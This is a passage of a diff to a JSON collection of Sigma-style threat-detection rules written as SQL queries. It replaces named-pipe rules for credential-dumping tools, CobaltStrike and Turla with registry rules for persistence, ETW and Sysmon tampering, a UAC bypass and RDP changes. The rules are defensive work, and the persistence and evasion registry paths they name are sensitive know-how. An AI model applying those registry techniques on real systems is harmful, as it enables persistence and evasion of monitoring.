'%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + ], + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" + }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": 